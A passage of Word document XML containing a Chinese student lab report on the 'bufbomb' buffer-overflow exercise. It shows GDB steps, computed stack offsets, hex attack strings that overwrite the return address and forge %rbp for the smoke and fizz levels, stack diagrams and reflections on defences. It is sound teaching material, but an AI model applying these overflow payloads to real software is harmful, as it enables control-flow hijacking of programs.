        <w:t>./bufbomb U202414802 smoke_hex.txt 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5837E3" w14:textId="4234B744" w:rsidR="00F268CA" w:rsidRDefault="00C074D3" w:rsidP="003D0806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结果：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D97B5E0" w14:textId="4C7D574D" w:rsidR="00C074D3" w:rsidRDefault="00F52D41" w:rsidP="00F52D41">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto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7F8AFD4F" wp14:editId="475006E9">
            <wp:extent cx="6135370" cy="1860550"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="3832635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63559" name="图片 383263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54A9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3. fizz（第 1 级）攻击记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0292A86D" w14:textId="4E74188C" w:rsidR="00B91EC2" w:rsidRPr="00B91EC2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（1）获取关键地址和偏移</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69112133" w14:textId="56DE9F0E" w:rsidR="00B91EC2" w:rsidRPr="00B91EC2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在 GDB 中调试：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D61459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/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>gdb ./bufbomb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D76B7A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/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(gdb) break getbuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A431CA8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/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(gdb) run U202414802 fizz_hex.txt 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD488F0" w14:textId="3588C104" w:rsidR="00B91EC2" w:rsidRPr="00B91EC2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同样停在 getbuf 第一条语句处，获得与 smoke 相同的栈帧信息：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B480AA" w14:textId="5A6183A1" w:rsidR="00B91EC2" w:rsidRPr="00053F04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lastRenderedPageBreak/>
        <w:t>buf 起始地址：0x7fffffffd470</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A257D4" w14:textId="6A0394C6" w:rsidR="00B91EC2" w:rsidRPr="00053F04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返回地址存放位置：0x7fffffffd4c8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D385E63" w14:textId="266F4F3E" w:rsidR="00B91EC2" w:rsidRPr="00B91EC2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旧 %rbp 存放位置：0x7fffffffd4c0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29420910" w14:textId="173FB2CD" w:rsidR="00B91EC2" w:rsidRPr="00B91EC2" w:rsidRDefault="00B91EC2" w:rsidP="00053F0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cookie 值（程序输出）：0xc109ad2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656279A3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（2）分析 fizz 函数汇编代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15483112" w14:textId="64FC97D4" w:rsidR="00B91EC2" w:rsidRPr="00B91EC2" w:rsidRDefault="00053F04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GDB输入指令</w:t>
      </w:r>
      <w:r w:rsidR="00846296">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8F3D0F" w14:textId="77777777" w:rsid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/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(gdb) disassemble fizz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5762588E" w14:textId="6AB72CCE" w:rsidR="00E72073" w:rsidRPr="00B91EC2" w:rsidRDefault="00E72073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/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="103ECA68" wp14:editId="6797C5C7">
            <wp:extent cx="6135370" cy="5838190"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="887316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6417" name="图片 887316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20CC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关键指令分析：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A744C6A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0x40146a &lt;+8&gt;:   mov    %edi,-0x4(%rbp)       ; 将参数 val 存入栈 [rbp-4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA4253F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0x40146d &lt;+11&gt;:  mov    0x2c75(%rip),%eax     ; 加载全局 cookie 到 eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7635B833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0x401473 &lt;+17&gt;:  cmp    %eax,-0x4(%rbp)       ; 比较 eax 与 [rbp-4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E88653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0x401476 &lt;+20&gt;:  jne    0x401493 &lt;fizz+49&gt;    ; 不等则跳转到失败分支</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77315C92" w14:textId="5CAE3677" w:rsidR="00B91EC2" w:rsidRPr="00B91EC2" w:rsidRDefault="00B91EC2" w:rsidP="00D34164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lastRenderedPageBreak/>
        <w:t>攻击策略：不跳转到 fizz 函数开头，而是跳转到 0x40146d 处（mov cookie,%eax 指令），同时伪造 %rbp 的值，使 -0x4(%rbp) 指向我们预先放好的 cookie 值，从而骗过比较逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE95FE0" w14:textId="226C66EC" w:rsidR="00B91EC2" w:rsidRPr="00B91EC2" w:rsidRDefault="00B91EC2" w:rsidP="00D3416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（3）计算伪造数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3712E713" w14:textId="37071144" w:rsidR="00B91EC2" w:rsidRPr="00B91EC2" w:rsidRDefault="00B91EC2" w:rsidP="00D34164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选择将 cookie 值放置在返回地址上方（紧接返回地址之后）</w:t>
      </w:r>
      <w:r w:rsidR="00EF605B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552E3119" w14:textId="3C08A262" w:rsidR="00B91EC2" w:rsidRPr="00B91EC2" w:rsidRDefault="006E10F2" w:rsidP="00EC6A78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即</w:t>
      </w:r>
      <w:r w:rsidR="00B91EC2" w:rsidRPr="00B91EC2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cookie 存放地址 = 0x7fffffffd4c8 + 8 = 0x7fffffffd4d0</w:t>
      </w:r>
      <w:r w:rsidR="00ED4B4B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00B91EC2" w:rsidRPr="00B91EC2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>为使 -0x4(%rbp) 指向该地址，需满足 fake_rbp - 0x4 = cookie 存放地址：</w:t>
      </w:r>
      <w:r w:rsidR="00B91EC2" w:rsidRPr="00B91EC2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>fake_rbp = 0x7fffffffd4d0 + 0x4 = 0x7fffffffd4d4</w:t>
      </w:r>
      <w:r w:rsidR="00DA69D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidR="00B91EC2" w:rsidRPr="00B91EC2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>跳转目标地址：0x40146d。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FC2C19" w14:textId="45306A16" w:rsidR="00B91EC2" w:rsidRPr="00B91EC2" w:rsidRDefault="00B91EC2" w:rsidP="008D76C5">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine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从 buf 到返回地址的偏移为 88 字节，其中前 80 字节为填充，第 81~88 字节为旧 %rbp 存放位置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B6C932" w14:textId="62973608" w:rsidR="00B91EC2" w:rsidRPr="00B91EC2" w:rsidRDefault="00B91EC2" w:rsidP="0081777E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（4）构造攻击字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40514D0B" w14:textId="5E00AD71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fizz_hex.txt 内容：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779E4D6C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0F0D194E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04907C90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36074EC5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5165A6B8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00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B9C1CD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 xml:space="preserve">d4 d4 ff ff ff 7f 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484CB0F6" w14:textId="77777777" w:rsidR="0011076D" w:rsidRPr="0011076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 xml:space="preserve">6d 14 40 00 00 00 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEBFECA" w14:textId="77777777" w:rsidR="00C52BCD" w:rsidRDefault="0011076D" w:rsidP="0011076D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11076D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>d2 9a 10 0c 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755ACE8C" w14:textId="6FCD66C9" w:rsidR="00B91EC2" w:rsidRPr="00B91EC2" w:rsidRDefault="00B91EC2" w:rsidP="00D3752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各部分含义：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE33D63" w14:textId="0E3A6C39" w:rsidR="00B91EC2" w:rsidRPr="00B91EC2" w:rsidRDefault="00B91EC2" w:rsidP="00D3752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前 80 字节：填充（0x</w:t>
      </w:r>
      <w:r w:rsidR="00D37522">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00B91EC2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253A13E0" w14:textId="725675AF" w:rsidR="00B91EC2" w:rsidRPr="00B91EC2" w:rsidRDefault="00B91EC2" w:rsidP="00D3752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第 81~88 字节：fake_rbp = 0x7fffffffd4d4（小端序）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223DEA27" w14:textId="79EDB681" w:rsidR="00B91EC2" w:rsidRPr="00D37522" w:rsidRDefault="00B91EC2" w:rsidP="00D3752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第 89~96 字节：跳转目标地址 0x40146d（小端序）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617252A3" w14:textId="2F7F5D7D" w:rsidR="00B91EC2" w:rsidRPr="00B91EC2" w:rsidRDefault="00B91EC2" w:rsidP="00D3752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第 97~104 字节：cookie = 0xc109ad2（小端序，高位补零）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D91339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（5）运行结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F10806" w14:textId="77777777" w:rsidR="002476D8" w:rsidRDefault="002476D8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运行指令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EF769F" w14:textId="1BA84F25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/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>./bufbomb U202414802 fizz_hex.txt 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A6ACB9" w14:textId="77777777" w:rsidR="00B91EC2" w:rsidRP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输出：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703CEB74" w14:textId="62BE34B1" w:rsidR="00B91EC2" w:rsidRPr="00B91EC2" w:rsidRDefault="00F8364F" w:rsidP="00B550B9">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto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/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35F84D22" wp14:editId="2553605F">
            <wp:extent cx="6135370" cy="2969895"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1394285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558" name="图片 139428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CA1F" w14:textId="136DF678" w:rsidR="00B91EC2" w:rsidRDefault="00B91EC2" w:rsidP="00B91EC2">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B91EC2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>打印的 val 值与 cookie 一致，成功达成 fizz 级别攻击目标。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695DA7E7" w14:textId="77777777" w:rsidR="00B91EC2" w:rsidRDefault="00B91EC2" w:rsidP="00F52D41">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto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01550217" w14:textId="77777777" w:rsidR="00B91EC2" w:rsidRDefault="00B91EC2" w:rsidP="00F52D41">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto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596E68B8" w14:textId="41AA4CC6" w:rsidR="003052C0" w:rsidRDefault="00EC3F8F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363C24" w:rsidRPr="00363C24">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>缓冲区溢出攻击</w:t>
      </w:r>
      <w:r w:rsidR="00363C24">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中字符串产生</w:t>
      </w:r>
      <w:r w:rsidR="001251E2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00363C24">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>方法描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4036CDDB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1. smoke 攻击栈帧结构图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1350276E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高地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05056DD9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+-----------------------------------+ 0x7fffffffd4d0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C53CADD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       (test 栈帧区域)            |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759A607D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+-----------------------------------+ 0x7fffffffd4c8  ← 返回地址存放处 (saved rip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E74A44E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返回地址被覆盖为 0x401445 (smoke)  |    写入 45 14 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD018C8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+-----------------------------------+ 0x7fffffffd4c0  ← 旧 %rbp 存放处 (saved rbp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19537F55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旧 %rbp 被覆盖（填充值 0x909090..）|    未特意控制，被填充字节覆盖</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3348AF14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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06716BE2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填充区域（0x90 × 88）             |    buf 开始到返回地址前共 88 字节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484479DE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其中 temp2 区域也被覆盖           |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06041F68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+-----------------------------------+ 0x7fffffffd470  ← buf[32] 起始地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67357F84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buf[32] 局部缓冲区               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A69E7A3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← 低地址 (%rsp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE81549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攻击方法：利用 buf 仅 32 字节却读入 66 字节的漏洞，从 buf 开始向上连续覆盖，将偏移 88 处的 8 字节（返回地址）篡改为 smoke 函数的入口地址 0x401445。当 getbuf 执行 ret 指令时，CPU 从栈上弹出该地址并跳转，从而执行 smoke 函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3185466C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lastRenderedPageBreak/>
        <w:t>2. fizz 攻击栈帧结构图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE2D803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高地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C85C06E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+-----------------------------------+ 0x7fffffffd4f0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323437E5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       (test 栈帧区域)            |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18511074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+-----------------------------------+ 0x7fffffffd4d0  ← cookie 存放地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F0F7D2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cookie 值: 0xc109ad2             |    D2 9A 10 0C 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6030A5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+-----------------------------------+ 0x7fffffffd4c8  ← 返回地址存放处</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3836FF6F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返回地址覆盖为 0x40146d           |    6D 14 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F228D5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+-----------------------------------+ 0x7fffffffd4c0  ← 旧 %rbp 存放处</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55152F3F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旧 %rbp 覆盖为 0x7fffffffd4d4    |    D4 D4 FF FF FF 7F 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C262BF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(fake_rbp)                        |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44531194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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D62C96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填充区域（0x90 × 80）             |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50795DD1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+-----------------------------------+ 0x7fffffffd470  ← buf[32] 起始地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B110745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|  buf[32] 局部缓冲区               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3750D4EF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+-----------------------------------+ ← 低地址 (%rsp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330599C2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攻击方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E88582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计算偏移量 = 返回地址存放地址 - buf起始地址 = 88 字节。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B56CADC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在偏移 80~87 字节处（旧 %rbp 存放位置）写入伪造的 %rbp 值 0x7fffffffd4d4。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB10C80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在偏移 88~95 字节处（返回地址位置）写入跳转目标 0x40146d（fizz 函数中的 mov cookie,%eax 指令地址）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72395547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在偏移 96~103 字节处（返回地址上方）写入 cookie 值 0xc109ad2。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C896946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当 ret 执行后，程序跳到 0x40146d，此时 %rbp = 0x7fffffffd4d4。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E986C3C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执行 mov 0x2c75(%rip),%eax 将全局 cookie 加载到 %eax。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187D106B" w14:textId="77777777" w:rsidR="00AF506D" w:rsidRPr="00AF506D" w:rsidRDefault="00AF506D" w:rsidP="00AF506D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF506D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>执行 cmp %eax,-0x4(%rbp) 时，-0x4(%rbp) = 0x7fffffffd4d0，该处正好是我们放置的 cookie 值，比较相等，攻击成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2058451B" w14:textId="77777777" w:rsidR="00AF506D" w:rsidRPr="00AF506D" w:rsidRDefault="00AF506D" w:rsidP="00AF506D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374296B3" w14:textId="2452BEBA" w:rsid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50184015" w14:textId="156BB453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通过本次缓冲区溢出攻击实验，我对以下知识点有了更深刻的理解：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5F4191" w14:textId="77777777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1. 栈帧结构与函数调用约定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B48F08" w14:textId="5F3B1676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通过 GDB 实际查看 info frame、反汇编代码、寄存器值和内存内容，我直观地看到了栈上局部变量、保存的 %rbp、返回地址的排列顺序。理解了 call/ret 指令与栈的互动机制，以及 x86-64 函数调用过程中参数传递的约定。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDFFEA0" w14:textId="77777777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2. 缓冲区溢出的危险性与利用方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E5287A" w14:textId="3F72EDF6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C 语言字符串操作没有边界检查，使得向过小的缓冲区写入过长的数据时可以覆盖栈上的控</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF4264">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>制信息。本实验中，我通过覆盖返回地址实现了控制流劫持smoke，通过伪造 %rbp 并跳转到函数内部实现了绕过条件判断fizz。这让我切身理解了为什么现代编译器默认开启栈保护，以及栈不可执行、地址随机化等防御机制的必要性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4EBF4A" w14:textId="77777777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3. 小端字节序在漏洞利用中的应用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3762F11B" w14:textId="74E79E90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构造攻击字符串时必须手动将地址和数值转换为小端序，这加深了我对内存数据存储方式的理解。一个字节顺序的错误就会导致攻击失败，这锻炼了我的细心和严谨性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C85978" w14:textId="77777777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4. 调试与逆向分析能力</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4A23F2" w14:textId="4355E9DE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实验中多次使用 GDB 设置断点、查看寄存器和内存、反汇编目标函数，来确定栈布局和偏移量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7351E4B6" w14:textId="77777777" w:rsidR="00DF4264" w:rsidRPr="00DF4264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5. 综合感受</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D262EE" w14:textId="77E9CBC4" w:rsidR="00EC3F8F" w:rsidRDefault="00DF4264" w:rsidP="00DF4264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DF4264">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>实验从“完全不知道怎么做”到“精确计算出每一个字节的位置”，虽然过程曲折，但每次错误都促使我更仔细地审视栈帧布局和指令语义。这是一次将理论知识与工程实践紧密结合的宝贵经历。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBFA8D8" w14:textId="77777777" w:rsidR="00930BE8" w:rsidRPr="00EE6B56" w:rsidRDefault="00930BE8" w:rsidP="006D7E91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59BD42A1" w14:textId="77777777" w:rsidR="00CE7677" w:rsidRDefault="00CE7677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00CE7677">
      <w:headerReference w:type="default" r:id="rId12"/>
      <w:footerReference w:type="default" r:id="rId13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3D4B" w14:textId="77777777" w:rsidR="00AD0821" w:rsidRDefault="00AD0821">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="439E1858" w14:textId="77777777" w:rsidR="00AD0821" w:rsidRDefault="00AD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EEEE" w14:textId="77777777" w:rsidR="00AD0821" w:rsidRDefault="00AD0821">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0623DCB9" w14:textId="77777777" w:rsidR="00AD0821" w:rsidRDefault="00AD0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3901C6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E94D08"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F1BC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7"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2111579090">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1853452475">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="98762778">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="173958236">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1510876139">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="458645280">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="904529711">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1328092602">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1547835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0C5C"/>
    <w:rsid w:val="00031197"/>
    <w:rsid w:val="00041FAE"/>
    <w:rsid w:val="00042F97"/>
    <w:rsid w:val="00053B99"/>
    <w:rsid w:val="00053F04"/>
    <w:rsid w:val="000709DD"/>
    <w:rsid w:val="00084D02"/>
    <w:rsid w:val="00086807"/>
    <w:rsid w:val="000A016A"/>
    <w:rsid w:val="000A2DE7"/>
    <w:rsid w:val="000B51C0"/>
    <w:rsid w:val="000C2D84"/>
    <w:rsid w:val="000C6E29"/>
    <w:rsid w:val="000D2006"/>
    <w:rsid w:val="000D20FC"/>
    <w:rsid w:val="000D4194"/>
    <w:rsid w:val="000D4791"/>
    <w:rsid w:val="000D5A7E"/>
    <w:rsid w:val="00106AE0"/>
    <w:rsid w:val="0011076D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87375"/>
    <w:rsid w:val="0019244F"/>
    <w:rsid w:val="00194190"/>
    <w:rsid w:val="001961F6"/>
    <w:rsid w:val="001A2030"/>
    <w:rsid w:val="001A241B"/>
    <w:rsid w:val="001C1F74"/>
    <w:rsid w:val="001D3E5F"/>
    <w:rsid w:val="001F09FC"/>
    <w:rsid w:val="001F0C8E"/>
    <w:rsid w:val="001F2571"/>
    <w:rsid w:val="00200EC3"/>
    <w:rsid w:val="002021D9"/>
    <w:rsid w:val="00234835"/>
    <w:rsid w:val="002400BA"/>
    <w:rsid w:val="002473F5"/>
    <w:rsid w:val="002476D8"/>
    <w:rsid w:val="00251A75"/>
    <w:rsid w:val="00256998"/>
    <w:rsid w:val="0027614A"/>
    <w:rsid w:val="002840C7"/>
    <w:rsid w:val="002949EE"/>
    <w:rsid w:val="002953F5"/>
    <w:rsid w:val="002A4549"/>
    <w:rsid w:val="002C431C"/>
    <w:rsid w:val="002D4225"/>
    <w:rsid w:val="002D63D7"/>
    <w:rsid w:val="002E21D2"/>
    <w:rsid w:val="002F0D82"/>
    <w:rsid w:val="002F16CE"/>
    <w:rsid w:val="00304527"/>
    <w:rsid w:val="003052C0"/>
    <w:rsid w:val="003054E0"/>
    <w:rsid w:val="0031768F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1954"/>
